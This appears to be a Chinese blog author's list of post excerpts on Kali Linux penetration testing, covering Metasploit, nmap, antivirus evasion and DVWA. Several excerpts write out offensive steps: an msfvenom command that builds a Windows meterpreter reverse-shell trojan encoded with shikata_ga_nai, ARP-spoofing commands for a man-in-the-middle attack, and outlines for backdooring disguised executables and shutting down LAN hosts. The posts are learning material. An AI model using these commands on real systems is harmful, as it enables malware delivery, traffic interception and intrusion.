网络安全
「已注销」
这个作者很懒,什么都没留下…
展开
-
各种靶场
DVWA推荐新手首选靶场,配置简单,需下载 phpstudy 和靶场文件包,简单部署之后即可访问。包含了常见的web漏洞(php的),每个漏洞分为四个等级,每个等级都有源码查看,最高等级的源码是最安全的。DVWA靶场源码下载:http://www.dvwa.co.uk/index.phpphpstudy官方下载:https://m.xp.cn/网络安全实验室做题的靶场,也是一个基础靶场,...原创 2020-03-16 18:13:53 · 1507 阅读 · 0 评论 -
metasploit 学习与使用
使用msfconsole命令进入msf我认为重要的两部分是exploit和payload一个是选择攻击方式一个是选择攻击载荷,合适的攻击方式有利于渗透成功,合适的payload有利于成功之后搭建通道输入help可以查看使用过程中需要的参数或者指令show options 显示他有哪些参数show payloads 查看库show exploits 就看以看到不同已知漏洞的利用程序会...原创 2020-03-12 20:58:50 · 339 阅读 · 0 评论 -
木马免杀(绕过杀软)
仅用于学习交流免杀是一个渗透测试中最苦恼的环节,也是一个需要学习很久的部分。利用kali生成的木马存在的问题就是无法避免市面上大多数的杀软,及时利用kali自带的免杀也无法达到很好的免杀效果。免杀技术1.修改二进制文件中的特征字符替换、擦除、修改2.加密技术通过加密方式使得特征字符不可读,从而逃避杀软检测运行时分片分段的解密执行,注入进程或杀软不检查的无害文件中3.防杀软的检测...原创 2020-03-11 22:46:17 · 3802 阅读 · 0 评论 -
kali初次启动msf出现WARNING: No database support的解决办法
该问题的原因是没有启动数据库支持WARNING: No database support警告:没有数据库支持解决方法:启动数据库同时设置为数据库自启动root@superman:~# systemctl start postgresql root@superman:~# systemctl enable postgresql然后reboot重新启动即可消除warning。我将在...原创 2020-03-10 22:31:42 · 1095 阅读 · 0 评论 -
Kali中Metasploit信息收集并使用暴力破解
信息收集在渗透测试中极为重要,只有了解了渗透对象的具体信息才能更有针对性的对目标进行测试渗透,暴力破解只是一种展示的方法,仅用于交流学习。1.1发起攻击的准备阶段1.1.1 使用Metasploit 中的nmap和arp_sweep 收集主机信息1.1.2 使用半连接方式扫描TCP端口1.1.3 使用auxiliary /sniffer下的psnuffle模块进行密码嗅探1.2基...原创 2020-03-10 21:55:53 · 791 阅读 · 2 评论 -
Kali利用0DAY漏洞CVE-2018-8174获取shell权限
*0day一把怎样的武器0day漏洞,又称“零日漏洞”(zero-day),是已经被发现(有可能未被公开),而官方还没有相关补丁的漏洞。通俗地讲就是,除了漏洞发现者,没有其他的人知道这个漏洞的存在,并且可以有效地加以利用,发起的攻击往往具有很大的突发性与破坏性。*原创 2020-03-10 21:26:01 · 2034 阅读 · 3 评论 -
在VMware中安装渗透测试系统Kali Linux最新版2020.1
Kali Linux 简介 Kali Linux是一个基于Debian的Linux发行版,旨在迚行高级渗透测试和安全审计。Kali Linux包 含数百种工具,适用于各种信息安全任务,如渗透测试,安全研究,计算机取证和逆向工程。Kali Linux 由公司Offensive Security开发,资劣和维护。 Offensive [əˈfensɪv] 攻击性的; Offensive Security 迚攻性安全 Kali Linux于2013年3月13日发布,Kali的前身是基于BackTr原创 2020-03-09 22:51:00 · 789 阅读 · 0 评论 -
kali中使用msf制作Windows恶意软件获取shell
1.1制作Windows恶意软件获取shell后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为思路就是利用社会工程学中人的心理,去为某些软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell1.1.1生成西瓜影音.exe后门程序1.1.2在MSF上启动handler开始监听后门程序1.1.3在Kali上...原创 2020-03-09 17:49:47 · 1174 阅读 · 0 评论 -
解决2020.1kali Linux的root账户无法登陆的问题
终端输入 sudo passwd rootsu rootsudo vi /etc/pam.d/gdm-autologin註釋行 “auth requied pam_succeed_if.so user != root quiet success”sudo vi /etc/pam.d/gdm-password註釋行 “auth requied pam_succeed_if.so user ...原创 2020-03-09 17:43:43 · 4802 阅读 · 3 评论 -
msfvenom获取shell
仅用于测试msfvenom各平台生成木马大全:windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload.exemac:msfv...原创 2020-03-08 11:36:19 · 2746 阅读 · 1 评论 -
nmap常用命令
Nmapnmap 192.168.43.* 扫描一个子网Nmap 192.168.43.1-100 扫描一个范围nmap -sS 192.168.1.1 syn扫描(默认)nmap -sT 192.168.1.1 tcp全连接nmap -sU 192.168.1.1 扫udp端口Nmap -sF 192.168.1.8 fin扫描nmap-sP 192.168...原创 2020-03-08 11:31:15 · 350 阅读 · 0 评论 -
安装kali之后的相关操作2020.1
1.下载iso 常规配置2.修改root密码 用root账号登陆终端输入 sudo passwd rootsu rootsudo vi /etc/pam.d/gdm-autologin註釋行 “auth requied pam_succeed_if.so user != root quiet success”sudo vi /etc/pam.d/gdm-password註釋行 “au...原创 2020-03-08 11:29:49 · 1522 阅读 · 0 评论 -
kali中使用msf进行信息收集的几种主要方式
基于tcp协议收集1.利用tcp做信息收集use auxiliary/scanner/discovery/arp_sweep设置相关属性 rhosts:目标ip therads:线程数2.半连接方式扫描停tcp接口use auxiliary/scanner/portscan/syn设置相关属性 rhosts therads3.执行密码嗅探search psnuffleuse ...原创 2020-03-08 11:27:23 · 622 阅读 · 0 评论 -
使用kali进行中间人攻击
##扫描局域网中存活的主机nmap -sS 192.168.1.*##对网关地址进行染毒arpspoof -t 192.168.1.56 -r 192.168.1.1此时目标主机192.168.1.56出现假的断网##开启路由转发 将目标主机的流量流进攻击机echo 1 > /proc/sys/net/ipv4/ip_forwardcat /proc/sys/net/ipv4/...原创 2020-03-08 11:25:24 · 980 阅读 · 0 评论 -
Kali对内网主机进行渗透并执行关机
1.1发起攻击的准备阶段1.1.1启动msf模块使用msfconsole1.1.2查找已知漏洞利用search加已知漏洞进行查找1.1.3扫一下局域网存活的主机,选择攻击目标1.1.4设置攻击目标ipSet rhosts 目标ip1.1.5搜索攻击载荷Search type:payload windows/shell1.1.6设置监听地址Set lhosts 监听i...原创 2020-03-08 11:22:29 · 7080 阅读 · 3 评论